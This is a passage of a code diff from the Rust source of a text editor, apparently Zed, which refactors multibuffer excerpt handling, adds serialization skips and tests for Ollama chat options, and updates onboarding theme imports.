Some(excerpt_ids) = self.excerpts_by_path.get(&path) else { + if sorted_anchors.is_empty() { + return; + } + sorted_anchors.sort_by(|a, b| a.cmp(b, &snapshot)); + let buffers = sorted_anchors.into_iter().chunk_by(|anchor| anchor.path); + let mut cursor = snapshot.excerpts.cursor::(()); + + for (path_index, excerpt_anchors) in &buffers { + let path = snapshot + .path_keys_by_index + .get(&path_index) + .expect("anchor from wrong multibuffer"); + + let mut excerpt_anchors = excerpt_anchors.peekable(); + let mut ranges = Vec::new(); + + cursor.seek_forward(path, Bias::Left); + let Some((buffer, buffer_snapshot)) = cursor + .item() + .map(|excerpt| (excerpt.buffer(&self), excerpt.buffer_snapshot(&snapshot))) + else { continue; }; - let ids_to_expand = HashSet::from_iter(ids); - let mut excerpt_id_ = None; - let expanded_ranges = excerpt_ids.iter().filter_map(|excerpt_id| { - let excerpt = snapshot.excerpt(*excerpt_id)?; - let excerpt_id = excerpt.id; - if excerpt_id_.is_none() { - excerpt_id_ = Some(excerpt_id); + while let Some(excerpt) = cursor.item() + && &excerpt.path_key == path + { + let mut range = ExcerptRange { + context: excerpt.range.context.to_point(buffer_snapshot), + primary: excerpt.range.primary.to_point(buffer_snapshot), + }; + + let mut needs_expand = false; + while excerpt_anchors.peek().is_some_and(|anchor| { + excerpt + .range + .contains(&anchor.text_anchor(), buffer_snapshot) + }) { + needs_expand = true; + excerpt_anchors.next(); } - let mut context = excerpt.range.context.to_point(&excerpt.buffer); - if ids_to_expand.contains(&excerpt_id) { + if needs_expand { match direction { ExpandExcerptDirection::Up => { - context.start.row = context.start.row.saturating_sub(line_count); - context.start.column = 0; + range.context.start.row = + range.context.start.row.saturating_sub(line_count); + range.context.start.column = 0; } ExpandExcerptDirection::Down => { - context.end.row = - (context.end.row + line_count).min(excerpt.buffer.max_point().row); - context.end.column = excerpt.buffer.line_len(context.end.row); + range.context.end.row = (range.context.end.row + line_count) + .min(excerpt.buffer_snapshot(&snapshot).max_point().row); + range.context.end.column = excerpt + .buffer_snapshot(&snapshot) + .line_len(range.context.end.row); } ExpandExcerptDirection::UpAndDown => { - context.start.row = context.start.row.saturating_sub(line_count); - context.start.column = 0; - context.end.row = - (context.end.row + line_count).min(excerpt.buffer.max_point().row); - context.end.column = excerpt.buffer.line_len(context.end.row); + range.context.start.row = + range.context.start.row.saturating_sub(line_count); + range.context.start.column = 0; + range.context.end.row = (range.context.end.row + line_count) + .min(excerpt.buffer_snapshot(&snapshot).max_point().row); + range.context.end.column = excerpt + .buffer_snapshot(&snapshot) + .line_len(range.context.end.row); } } } - Some(ExcerptRange { - context, - primary: excerpt.range.primary.to_point(&excerpt.buffer), - }) - }); - let mut merged_ranges: Vec> = Vec::new(); - for range in expanded_ranges { - if let Some(last_range) = merged_ranges.last_mut() - && last_range.context.end >= range.context.start - { - last_range.context.end = range.context.end; - continue; - } - merged_ranges.push(range) + ranges.push(range); + cursor.next(); } - let Some(excerpt_id) = excerpt_id_ else { - continue; - }; - let Some(buffer_id) = &snapshot.buffer_id_for_excerpt(excerpt_id) else { - continue; - }; - let Some(buffer) = self.buffers.get(buffer_id).map(|b| b.buffer.clone()) else { - continue; - }; + ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); - let buffer_snapshot = buffer.read(cx).snapshot(); - self.update_path_excerpts(path.clone(), buffer, &buffer_snapshot, merged_ranges, cx); + self.set_excerpt_ranges_for_path(path.clone(), buffer, buffer_snapshot, ranges, cx); } } /// Sets excerpts, returns `true` if at least one new excerpt was added. - fn set_merged_excerpt_ranges_for_path( + pub(crate) fn set_merged_excerpt_ranges_for_path( &mut self, path: PathKey, buffer: Entity, - ranges: Vec>, buffer_snapshot: &BufferSnapshot, - new: Vec>, - counts: Vec, + new: Vec>, cx: &mut Context, - ) -> (Vec>, bool) { - let insert_result = self.update_path_excerpts(path, buffer, buffer_snapshot, new, cx); - - let mut result = Vec::new(); - let mut ranges = ranges.into_iter(); - for (excerpt_id, range_count) in insert_result - .excerpt_ids + ) -> (bool, PathKeyIndex) + where + T: language::ToOffset, + { + let anchor_ranges = new .into_iter() - .zip(counts.into_iter()) - { - for range in ranges.by_ref().take(range_count) { - let range = Anchor::range_in_buffer( - excerpt_id, - buffer_snapshot.anchor_before(&range.primary.start) - ..buffer_snapshot.anchor_after(&range.primary.end), - ); - result.push(range) - } + .map(|r| ExcerptRange { + context: buffer_snapshot.anchor_before(r.context.start) + ..buffer_snapshot.anchor_after(r.context.end), + primary: buffer_snapshot.anchor_before(r.primary.start) + ..buffer_snapshot.anchor_after(r.primary.end), + }) + .collect::>(); + let inserted = + self.update_path_excerpts(path.clone(), buffer, buffer_snapshot, &anchor_ranges, cx); + let path_key_index = self.get_or_create_path_key_index(&path); + (inserted, path_key_index) + } + + pub(crate) fn get_or_create_path_key_index(&mut self, path_key: &PathKey) -> PathKeyIndex { + let mut snapshot = self.snapshot.borrow_mut(); + + if let Some(&existing) = snapshot.indices_by_path_key.get(path_key) { + return existing; } - (result, insert_result.added_new_excerpt) + + let index = snapshot + .path_keys_by_index + .last() + .map(|(index, _)| PathKeyIndex(index.0 + 1)) + .unwrap_or(PathKeyIndex(0)); + snapshot.path_keys_by_index.insert(index, path_key.clone()); + snapshot.indices_by_path_key.insert(path_key.clone(), index); + index } pub fn update_path_excerpts( &mut self, - path: PathKey, + path_key: PathKey, buffer: Entity, buffer_snapshot: &BufferSnapshot, - new: Vec>, + to_insert: &Vec>, cx: &mut Context, - ) -> PathExcerptInsertResult { - let mut insert_after = self - .excerpts_by_path - .range(..path.clone()) - .next_back() - .and_then(|(_, value)| value.last().copied()) - .unwrap_or(ExcerptId::min()); - - let existing = self - .excerpts_by_path - .get(&path) - .cloned() - .unwrap_or_default(); - let mut new_iter = new.into_iter().peekable(); - let mut existing_iter = existing.into_iter().peekable(); - - let mut excerpt_ids = Vec::new(); - let mut to_remove = Vec::new(); - let mut to_insert: Vec<(ExcerptId, ExcerptRange)> = Vec::new(); - let mut added_a_new_excerpt = false; - let snapshot = self.snapshot(cx); + ) -> bool { + let path_key_index = self.get_or_create_path_key_index(&path_key); + if let Some(old_path_key) = self + .snapshot(cx) + .path_for_buffer(buffer_snapshot.remote_id()) + && old_path_key != &path_key + { + self.remove_excerpts(old_path_key.clone(), cx); + } - let mut next_excerpt_id = - if let Some(last_entry) = self.snapshot.get_mut().excerpt_ids.last() { - last_entry.id.0 + 1 - } else { - 1 - }; + if to_insert.len() == 0 { + self.remove_excerpts(path_key.clone(), cx); - let mut next_excerpt_id = move || ExcerptId(post_inc(&mut next_excerpt_id)); + return false; + } + assert_eq!(self.history.transaction_depth(), 0); + self.sync_mut(cx); - let mut excerpts_cursor = snapshot.excerpts.cursor::>(()); - excerpts_cursor.next(); + let buffer_id = buffer_snapshot.remote_id(); - loop { - let existing = if let Some(&existing_id) = existing_iter.peek() { - let locator = snapshot.excerpt_locator_for_id(existing_id); - excerpts_cursor.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = excerpts_cursor.item() { - if excerpt.buffer_id != buffer_snapshot.remote_id() { - to_remove.push(existing_id); - existing_iter.next(); - continue; - } - Some((existing_id, excerpt.range.context.to_point(buffer_snapshot))) - } else { - None - } - } else { - None + let mut snapshot = self.snapshot.get_mut(); + let mut cursor = snapshot + .excerpts + .cursor::>(()); + let mut new_excerpts = SumTree::new(()); + + let new_ranges = to_insert.clone(); + let mut to_insert = to_insert.iter().peekable(); + let mut patch = Patch::empty(); + let mut added_new_excerpt = false; + + new_excerpts.append(cursor.slice(&path_key, Bias::Left), ()); + + // handle the case where the path key used to be associated + // with a different buffer by removing its excerpts. + if let Some(excerpt) = cursor.item() + && &excerpt.path_key == &path_key + && excerpt.buffer_id != buffer_id + { + let old_buffer_id = excerpt.buffer_id; + self.buffers.remove(&old_buffer_id); + snapshot.buffers.remove(&old_buffer_id); + remove_diff_state(&mut snapshot.diffs, old_buffer_id); + self.diffs.remove(&old_buffer_id); + let before = cursor.position.1; + cursor.seek_forward(&path_key, Bias::Right); + let after = cursor.position.1; + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); + cx.emit(Event::BuffersRemoved { + removed_buffer_ids: vec![old_buffer_id], + }); + } + + while let Some(excerpt) = cursor.item() + && excerpt.path_key == path_key + { + assert_eq!(excerpt.buffer_id, buffer_id); + let Some(next_excerpt) = to_insert.peek() else { + break; }; + if &excerpt.range == *next_excerpt { + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + if !prev_excerpt.has_trailing_newline { + prev_excerpt.has_trailing_newline = true; + patch.push(Edit { + old: cursor.position.1..cursor.position.1, + new: before..before + MultiBufferOffset(1), + }); + } + }, + (), + ); + new_excerpts.push(excerpt.clone(), ()); + to_insert.next(); + cursor.next(); + continue; + } - let new = new_iter.peek(); - // Try to merge the next new range or existing excerpt into the last - // queued insert. - if let Some((last_id, last)) = to_insert.last_mut() { - // Next new range overlaps the last queued insert: absorb it by - // extending the insert's end. - if let Some(new) = new - && last.context.end >= new.context.start - { - last.context.end = last.context.end.max(new.context.end); - excerpt_ids.push(*last_id); - new_iter.next(); - continue; - } - // Next existing excerpt overlaps the last queued insert: absorb - // it by extending the insert's end, and record the existing - // excerpt as replaced so anchors in it resolve to the new one. - if let Some((existing_id, existing_range)) = &existing - && last.context.end >= existing_range.start - { - last.context.end = last.context.end.max(existing_range.end); - to_remove.push(*existing_id); - Arc::make_mut(&mut self.snapshot.get_mut().replaced_excerpts) - .insert(*existing_id, *last_id); - existing_iter.next(); - continue; - } + if excerpt + .range + .context + .start + .cmp(&next_excerpt.context.start, &buffer_snapshot) + .is_le() + { + // remove old excerpt + let before = cursor.position.1; + cursor.next(); + let after = cursor.position.1; + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); + } else { + // insert new excerpt + let next_excerpt = to_insert.next().unwrap(); + added_new_excerpt = true; + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + prev_excerpt.has_trailing_newline = true; + }, + (), + ); + new_excerpts.push( + Excerpt::new( + path_key.clone(), + path_key_index, + &buffer_snapshot, + next_excerpt.clone(), + false, + ), + (), + ); + let after = new_excerpts.summary().len(); + patch.push_maybe_empty(Edit { + old: cursor.position.1..cursor.position.1, + new: before..after, + }); } + } - match (new, existing) { - (None, None) => break, + // remove any further trailing excerpts + let mut before = cursor.position.1; + cursor.seek_forward(&path_key, Bias::Right); + let after = cursor.position.1; + // if we removed the previous last excerpt, remove the trailing newline from the new last excerpt + if cursor.item().is_none() && to_insert.peek().is_none() { + new_excerpts.update_last( + |excerpt| { + if excerpt.has_trailing_newline { + before.0.0 = before + .0 + .0 + .checked_sub(1) + .expect("should have preceding excerpt"); + excerpt.has_trailing_newline = false; + } + }, + (), + ); + } + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); - // No more new ranges; remove the remaining existing excerpt. - (None, Some((existing_id, _))) => { - existing_iter.next(); - to_remove.push(existing_id); - } + while let Some(next_excerpt) = to_insert.next() { + added_new_excerpt = true; + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + prev_excerpt.has_trailing_newline = true; + }, + (), + ); + new_excerpts.push( + Excerpt::new( + path_key.clone(), + path_key_index, + &buffer_snapshot, + next_excerpt.clone(), + false, + ), + (), + ); + let after = new_excerpts.summary().len(); + patch.push_maybe_empty(Edit { + old: cursor.position.1..cursor.position.1, + new: before..after, + }); + } - // No more existing excerpts; queue the new range for insertion. - (Some(_), None) => { - added_a_new_excerpt = true; - let new_id = next_excerpt_id(); - excerpt_ids.push(new_id); - to_insert.push((new_id, new_iter.next().unwrap())); - } + let suffix_start = cursor.position.1; + let suffix = cursor.suffix(); + let changed_trailing_excerpt = suffix.is_empty(); + if !suffix.is_empty() { + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + if !prev_excerpt.has_trailing_newline { + prev_excerpt.has_trailing_newline = true; + patch.push(Edit { + old: suffix_start..suffix_start, + new: before..before + MultiBufferOffset(1), + }); + } + }, + (), + ); + } + new_excerpts.append(suffix, ()); + drop(cursor); + + snapshot.excerpts = new_excerpts; + snapshot.buffers.insert( + buffer_id, + BufferStateSnapshot { + path_key: path_key.clone(), + path_key_index, + buffer_snapshot: buffer_snapshot.clone(), + }, + ); + + self.buffers.entry(buffer_id).or_insert_with(|| { + self.buffer_changed_since_sync.replace(true); + buffer.update(cx, |buffer, _| { + buffer.record_changes(Rc::downgrade(&self.buffer_changed_since_sync)); + }); + BufferState { + _subscriptions: [ + cx.observe(&buffer, |_, _, cx| cx.notify()), + cx.subscribe(&buffer, Self::on_buffer_event), + ], + buffer: buffer.clone(), + } + }); - // Existing excerpt ends before the new range starts, so it - // has no corresponding new range and must be removed. Flush - // pending inserts and advance `insert_after` past it so that - // future inserts receive locators *after* this excerpt's - // locator, preserving forward ordering. - (Some(new), Some((_, existing_range))) - if existing_range.end < new.context.start => - { - self.insert_excerpts_with_ids_after( - insert_after, - buffer.clone(), - mem::take(&mut to_insert), - cx, - ); - insert_after = existing_iter.next().unwrap(); - to_remove.push(insert_after); - } - // New range ends before the existing excerpt starts, so the - // new range has no corresponding existing excerpt. Queue it - // for insertion at the current `insert_after` position - // (before the existing excerpt), which is the correct - // spatial ordering. - (Some(new), Some((_, existing_range))) - if existing_range.start > new.context.end => - { - let new_id = next_excerpt_id(); - excerpt_ids.push(new_id); - to_insert.push((new_id, new_iter.next().unwrap())); - } - // Exact match: keep the existing excerpt in place, flush - // any pending inserts before it, and use it as the new - // `insert_after` anchor. - (Some(new), Some((_, existing_range))) - if existing_range.start == new.context.start - && existing_range.end == new.context.end => - { - self.insert_excerpts_with_ids_after( - insert_after, - buffer.clone(), - mem::take(&mut to_insert), - cx, - ); - insert_after = existing_iter.next().unwrap(); - excerpt_ids.push(insert_after); - new_iter.next(); - } + if changed_trailing_excerpt { + snapshot.trailing_excerpt_update_count += 1; + } - // Partial overlap: replace the existing excerpt with a new - // one whose range is the union of both, and record the - // replacement so that anchors in the old excerpt resolve to - // the new one. - (Some(_), Some((_, existing_range))) => { - let existing_id = existing_iter.next().unwrap(); - let new_id = next_excerpt_id(); - Arc::make_mut(&mut self.snapshot.get_mut().replaced_excerpts) - .insert(existing_id, new_id); - to_remove.push(existing_id); - let mut range = new_iter.next().unwrap(); - range.context.start = range.context.start.min(existing_range.start); - range.context.end = range.context.end.max(existing_range.end); - excerpt_ids.push(new_id); - to_insert.push((new_id, range)); - } - }; + let edits = Self::sync_diff_transforms( + &mut snapshot, + patch.into_inner(), + DiffChangeKind::BufferEdited, + ); + if !edits.is_empty() { + self.subscriptions.publish(edits); } - self.insert_excerpts_with_ids_after(insert_after, buffer, to_insert, cx); - // todo(lw): There is a logic bug somewhere that causes the to_remove vector to be not ordered correctly - to_remove.sort_by_cached_key(|&id| snapshot.excerpt_locator_for_id(id)); - self.remove_excerpts(to_remove, cx); + cx.emit(Event::Edited { + edited_buffer: None, + is_local: true, + }); + cx.emit(Event::BufferRangesUpdated { + buffer, + path_key: path_key.clone(), + ranges: new_ranges, + }); + cx.notify(); - if excerpt_ids.is_empty() { - self.excerpts_by_path.remove(&path); - } else { - let snapshot = &*self.snapshot.get_mut(); - let excerpt_ids = excerpt_ids - .iter() - .dedup() - .cloned() - // todo(lw): There is a logic bug somewhere that causes excerpt_ids to not necessarily be in order by locator - .sorted_by_cached_key(|&id| snapshot.excerpt_locator_for_id(id)) - .collect(); - for &excerpt_id in &excerpt_ids { - self.paths_by_excerpt.insert(excerpt_id, path.clone()); - } - self.excerpts_by_path.insert(path, excerpt_ids); + added_new_excerpt + } + + pub fn remove_excerpts_for_buffer(&mut self, buffer: BufferId, cx: &mut Context) { + let snapshot = self.sync_mut(cx); + let Some(path) = snapshot.path_for_buffer(buffer).cloned() else { + return; + }; + self.remove_excerpts(path, cx); + } + + pub fn remove_excerpts(&mut self, path: PathKey, cx: &mut Context) { + assert_eq!(self.history.transaction_depth(), 0); + self.sync_mut(cx); + + let mut snapshot = self.snapshot.get_mut(); + let mut cursor = snapshot + .excerpts + .cursor::>(()); + let mut new_excerpts = SumTree::new(()); + new_excerpts.append(cursor.slice(&path, Bias::Left), ()); + let mut edit_start = cursor.position.1; + let mut buffer_id = None; + if let Some(excerpt) = cursor.item() + && excerpt.path_key == path + { + buffer_id = Some(excerpt.buffer_id); } + cursor.seek(&path, Bias::Right); + let edit_end = cursor.position.1; + let suffix = cursor.suffix(); + let changed_trailing_excerpt = suffix.is_empty(); + new_excerpts.append(suffix, ()); + + if let Some(buffer_id) = buffer_id { + snapshot.buffers.remove(&buffer_id); + remove_diff_state(&mut snapshot.diffs, buffer_id); + self.buffers.remove(&buffer_id); + self.diffs.remove(&buffer_id); + cx.emit(Event::BuffersRemoved { + removed_buffer_ids: vec![buffer_id], + }) + } + drop(cursor); + if changed_trailing_excerpt { + snapshot.trailing_excerpt_update_count += 1; + new_excerpts.update_last( + |excerpt| { + if excerpt.has_trailing_newline { + excerpt.has_trailing_newline = false; + edit_start.0.0 = edit_start + .0 + .0 + .checked_sub(1) + .expect("should have at least one excerpt"); + } + }, + (), + ) + } + + let edit = Edit { + old: edit_start..edit_end, + new: edit_start..edit_start, + }; + snapshot.excerpts = new_excerpts; - PathExcerptInsertResult { - excerpt_ids, - added_new_excerpt: added_a_new_excerpt, + let edits = + Self::sync_diff_transforms(&mut snapshot, vec![edit], DiffChangeKind::BufferEdited); + if !edits.is_empty() { + self.subscriptions.publish(edits); } + + cx.emit(Event::Edited { + edited_buffer: None, + is_local: true, + }); + cx.notify(); } } diff --git a/crates/multi_buffer/src/transaction.rs b/crates/multi_buffer/src/transaction.rs index a65e394c8f1834a95ccbc70532aa03d2a3e6e34c..a3afe55cd6928b9e908d0249af5fb8fe7fc4bbe4 100644 --- a/crates/multi_buffer/src/transaction.rs +++ b/crates/multi_buffer/src/transaction.rs @@ -2,15 +2,15 @@ use gpui::{App, Context, Entity}; use language::{self, Buffer, TransactionId}; use std::{ collections::HashMap, - ops::{AddAssign, Range, Sub}, + ops::Range, time::{Duration, Instant}, }; use sum_tree::Bias; use text::BufferId; -use crate::{BufferState, MultiBufferDimension}; +use crate::{Anchor, BufferState, MultiBufferOffset}; -use super::{Event, ExcerptSummary, MultiBuffer}; +use super::{Event, MultiBuffer}; #[derive(Clone)] pub(super) struct History { @@ -314,71 +314,50 @@ impl MultiBuffer { } } - pub fn edited_ranges_for_transaction( + pub fn edited_ranges_for_transaction( &self, transaction_id: TransactionId, cx: &App, - ) -> Vec> - where - D: MultiBufferDimension - + Ord - + Sub - + AddAssign, - D::TextDimension: PartialOrd + Sub, - { + ) -> Vec> { let Some(transaction) = self.history.transaction(transaction_id) else { return Vec::new(); }; - let mut ranges = Vec::new(); let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::(()); + let mut buffer_anchors = Vec::new(); for (buffer_id, buffer_transaction) in &transaction.buffer_transactions { - let Some(buffer_state) = self.buffers.get(buffer_id) else { + let Some(buffer) = self.buffer(*buffer_id) else { continue; }; + let Some(excerpt) = snapshot.first_excerpt_for_buffer(*buffer_id) else { + continue; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); - let buffer = buffer_state.buffer.read(cx); - for range in - buffer.edited_ranges_for_transaction_id::(*buffer_transaction) + for range in buffer + .read(cx) + .edited_ranges_for_transaction_id::(*buffer_transaction) { - for excerpt_id in &buffer_state.excerpts { - cursor.seek(excerpt_id, Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *excerpt_id - { - let excerpt_buffer_start = excerpt - .range - .context - .start - .summary::(buffer); - let excerpt_buffer_end = excerpt - .range - .context - .end - .summary::(buffer); - let excerpt_range = excerpt_buffer_start..excerpt_buffer_end; - if excerpt_range.contains(&range.start) - && excerpt_range.contains(&range.end) - { - let excerpt_start = D::from_summary(&cursor.start().text); - - let mut start = excerpt_start; - start += range.start - excerpt_buffer_start; - let mut end = excerpt_start; - end += range.end - excerpt_buffer_start; - - ranges.push(start..end); - break; - } - } - } + buffer_anchors.push(Anchor::in_buffer( + excerpt.path_key_index, + buffer_snapshot.anchor_at(range.start, Bias::Left), + )); + buffer_anchors.push(Anchor::in_buffer( + excerpt.path_key_index, + buffer_snapshot.anchor_at(range.end, Bias::Right), + )); } } + buffer_anchors.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - ranges.sort_by_key(|range| range.start); - ranges + snapshot + .summaries_for_anchors(buffer_anchors.iter()) + .as_chunks::<2>() + .0 + .iter() + .map(|&[s, e]| s..e) + .collect::>() } pub fn merge_transactions( diff --git a/crates/notifications/Cargo.toml b/crates/notifications/Cargo.toml index 8304c788fdd1ca840d68dbb4eb24bf5e3e79abdc..e0640c67cc55b3c2ba742e762d0e7a1e9d414c40 100644 --- a/crates/notifications/Cargo.toml +++ b/crates/notifications/Cargo.toml @@ -15,7 +15,7 @@ doctest = false [features] test-support = [ "channel/test-support", - "collections/test-support", + "gpui/test-support", "rpc/test-support", ] @@ -37,8 +37,6 @@ zed_actions.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } -collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } rpc = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } util = { workspace = true, features = ["test-support"] } diff --git a/crates/ollama/src/ollama.rs b/crates/ollama/src/ollama.rs index dd439bc5d690c308828ca7be491efdf751a9a09c..bae8212d34891a79107c42cb445088a55fbf3f4f 100644 --- a/crates/ollama/src/ollama.rs +++ b/crates/ollama/src/ollama.rs @@ -123,10 +123,15 @@ pub struct ChatRequest { // https://github.com/ollama/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values #[derive(Serialize, Default, Debug)] pub struct ChatOptions { + #[serde(skip_serializing_if = "Option::is_none")] pub num_ctx: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub num_predict: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub stop: Option>, + #[serde(skip_serializing_if = "Option::is_none")] pub temperature: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub top_p: Option, } @@ -588,4 +593,96 @@ mod tests { assert_eq!(message_images.len(), 1); assert_eq!(message_images[0].as_str().unwrap(), base64_image); } + + #[test] + fn test_chat_options_serialization() { + // When stop is None, it should not appear in JSON at all + // This allows Ollama to use the model's default stop tokens + let options_no_stop = ChatOptions { + num_ctx: Some(4096), + stop: None, + temperature: Some(0.7), + ..Default::default() + }; + let serialized = serde_json::to_string(&options_no_stop).unwrap(); + assert!( + !serialized.contains("stop"), + "stop should not be in JSON when None" + ); + assert!(serialized.contains("num_ctx")); + assert!(serialized.contains("temperature")); + + // When stop has values, they should be serialized + let options_with_stop = ChatOptions { + stop: Some(vec!["<|eot_id|>".to_string()]), + ..Default::default() + }; + let serialized = serde_json::to_string(&options_with_stop).unwrap(); + assert!(serialized.contains("stop")); + assert!(serialized.contains("<|eot_id|>")); + + // All None options should result in empty object + let options_all_none = ChatOptions::default(); + let serialized = serde_json::to_string(&options_all_none).unwrap(); + assert_eq!(serialized, "{}"); + } + + #[test] + fn test_chat_request_with_stop_tokens() { + let request = ChatRequest { + model: "rnj-1:8b".to_string(), + messages: vec![ChatMessage::User { + content: "Hello".to_string(), + images: None, + }], + stream: true, + keep_alive: KeepAlive::default(), + options: Some(ChatOptions { + stop: Some(vec!["<|eot_id|>".to_string(), "<|end|>".to_string()]), + ..Default::default() + }), + think: None, + tools: vec![], + }; + + let serialized = serde_json::to_string(&request).unwrap(); + let parsed: serde_json::Value = serde_json::from_str(&serialized).unwrap(); + + let stop = parsed["options"]["stop"].as_array().unwrap(); + assert_eq!(stop.len(), 2); + assert_eq!(stop[0].as_str().unwrap(), "<|eot_id|>"); + assert_eq!(stop[1].as_str().unwrap(), "<|end|>"); + } + + #[test] + fn test_chat_request_without_stop_tokens_omits_field() { + // This tests the fix for issue #47798 + // When no stop tokens are provided, the field should be omitted + // so Ollama uses the model's default stop tokens from Modelfile + let request = ChatRequest { + model: "rnj-1:8b".to_string(), + messages: vec![ChatMessage::User { + content: "Hello".to_string(), + images: None, + }], + stream: true, + keep_alive: KeepAlive::default(), + options: Some(ChatOptions { + num_ctx: Some(4096), + stop: None, // No stop tokens - should be omitted from JSON + ..Default::default() + }), + think: None, + tools: vec![], + }; + + let serialized = serde_json::to_string(&request).unwrap(); + + // The key check: "stop" should not appear in the serialized JSON + assert!( + !serialized.contains("\"stop\""), + "stop field should be omitted when None, got: {}", + serialized + ); + } } diff --git a/crates/onboarding/Cargo.toml b/crates/onboarding/Cargo.toml index e5e5b5cac93aa4021f8933bd38f8711d53b89902..545a4b614160054186d4acf7bce17e36ac1cd4f1 100644 --- a/crates/onboarding/Cargo.toml +++ b/crates/onboarding/Cargo.toml @@ -32,6 +32,7 @@ serde.workspace = true settings.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true vim_mode_setting.workspace = true diff --git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index b683b13743819bbba692a99a7c559cfd9823a4b4..b2e595b28a33ed4ee7f066c4d969baffdb2a081b 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -5,14 +5,11 @@ use fs::Fs; use gpui::{Action, App, IntoElement}; use project::project_settings::ProjectSettings; use settings::{BaseKeymap, Settings, update_settings_file}; -use theme::{ - Appearance, SystemAppearance, ThemeAppearanceMode, ThemeName, ThemeRegistry, ThemeSelection, - ThemeSettings, -}; +use theme::{Appearance, SystemAppearance, ThemeRegistry}; +use theme_settings::{ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings}; use ui::{ - Divider, ParentElement as _, StatefulInteractiveElement, SwitchField, TintColor, - ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, - prelude::*, rems_from_px, + Divider, StatefulInteractiveElement, SwitchField, TintColor, ToggleButtonGroup, + ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, prelude::*, }; use vim_mode_setting::VimModeSetting; @@ -198,7 +195,7 @@ fn render_theme_section(tab_index: &mut isize, cx: &mut App) -> impl IntoElement fn write_mode_change(mode: ThemeAppearanceMode, cx: &mut App) { let fs = ::global(cx); update_settings_file(fs, cx, move |settings, _cx| { - theme::set_mode(settings, mode); + theme_settings::set_mode(settings, mode); }); } @@ -220,13 +217,13 @@ fn render_theme_section(tab_index: &mut isize, cx: &mut App) -> impl IntoElement dark: ThemeName(dark_theme.into()), }); } - ThemeAppearanceMode::Light => theme::set_theme( + ThemeAppearanceMode::Light => theme_settings::set_theme( settings, theme, Appearance::Light, *SystemAppearance::global(cx), ), - ThemeAppearanceMode::Dark => theme::set_theme( + ThemeAppearanceMode::Dark => theme_settings::set_theme( settings, theme, Appearance::Dark, @@ -477,8 +474,7 @@ fn render_setting_import_button( .toggle_state(imported) .tab_index(tab_index) .when(imported, |this| { - this.icon(IconName::Check) - .icon_size(IconSize::Small) + this.end_icon(Icon::new(IconName::Check).size(IconSize::Small)) .color(Color::Success) }) .on_click(move |_, window, cx| { diff --git a/crates/onboarding/src/multibuffer_hint.rs b/crates/onboarding/src/multibuffer_hint.rs index 26ab409fbad6333f2e56ee4a274a43806adce676..56092863c8b5ae1a18694a23419fc2127c5bdc81 100644 --- a/crates/onboarding/src/multibuffer_hint.rs +++ b/crates/onboarding/src/multibuffer_hint.rs @@ -2,7 +2,7 @@ use std::collections::HashSet; use std::sync::OnceLock; use std::sync::atomic::{AtomicUsize, Ordering}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use gpui::{App, EntityId, EventEmitter, Subscription}; use ui::{IconButtonShape, Tooltip, prelude::*}; use workspace::item::{ItemBufferKind, ItemEvent, ItemHandle}; @@ -35,10 +35,10 @@ impl MultibufferHint { } impl MultibufferHint { - fn counter() -> &'static AtomicUsize { + fn counter(cx: &App) -> &'static AtomicUsize { static SHOWN_COUNT: OnceLock = OnceLock::new(); SHOWN_COUNT.get_or_init(|| { - let value: usize = KEY_VALUE_STORE + let value: usize = KeyValueStore::global(cx) .read_kvp(SHOWN_COUNT_KEY) .ok() .flatten() @@ -49,19 +49,21 @@ impl MultibufferHint { }) } - fn shown_count() -> usize { - Self::counter().load(Ordering::Relaxed) + fn shown_count(cx: &App) -> usize { + Self::counter(cx).load(Ordering::Relaxed) } fn increment_count(cx: &mut App) { - Self::set_count(Self::shown_count() + 1, cx) + Self::set_count(Self::shown_count(cx) + 1, cx) } pub(crate) fn set_count(count: usize, cx: &mut App) { - Self::counter().store(count, Ordering::Relaxed); + Self::counter(cx).store(count, Ordering::Relaxed); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count)) + let kvp = KeyValueStore::global(cx); + db::write_and_log(cx, move || async move { + kvp.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count)) + .await }); } @@ -71,7 +73,7 @@ impl MultibufferHint { /// Determines the toolbar location for this [`MultibufferHint`]. fn determine_toolbar_location(&mut self, cx: &mut Context) -> ToolbarItemLocation { - if Self::shown_count() >= NUMBER_OF_HINTS { + if Self::shown_count(cx) >= NUMBER_OF_HINTS { return ToolbarItemLocation::Hidden; } @@ -158,10 +160,11 @@ impl Render for MultibufferHint { ) .child( Button::new("open_docs", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + 